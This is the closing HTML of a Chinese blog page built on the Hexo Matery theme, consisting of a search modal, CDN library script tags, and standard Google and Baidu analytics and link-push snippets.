        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script src="/js/search.js"></script>
<script type="text/javascript">
$(function () {
    searchFunc("/" + "search.xml", 'searchInput', 'searchResult');
});
</script>
    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script src="https://cdn.bootcdn.net/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/masonry/4.0.0/masonry.pkgd.min.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/aos/3.0.0-beta.6/aos.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/scrollprogress/3.0.2/scrollProgress.min.js"></script>
    <script src="https://cdn.bootcdn.net/ajax/libs/lightgallery/1.6.11/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Global site tag (gtag.js) - Google Analytics -->

<script async src="https://www.googletagmanager.com/gtag/js?id=UA-160042502-1"></script>
<script>
    window.dataLayer = window.dataLayer || [];
    function gtag() {
        dataLayer.push(arguments);
    }

    gtag('js', new Date());
    gtag('config', 'UA-160042502-1');
</script>


    <!-- Baidu Analytics -->

<script>
    var _hmt = _hmt || [];
    (function () {
        var hm = document.createElement("script");
        hm.src = "https://hm.baidu.com/hm.js?0e306ce3426983ae6367d094d39f1190";
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(hm, s);
    })();
</script>

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

    

    

    
    
    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    

        
</body>

</html>
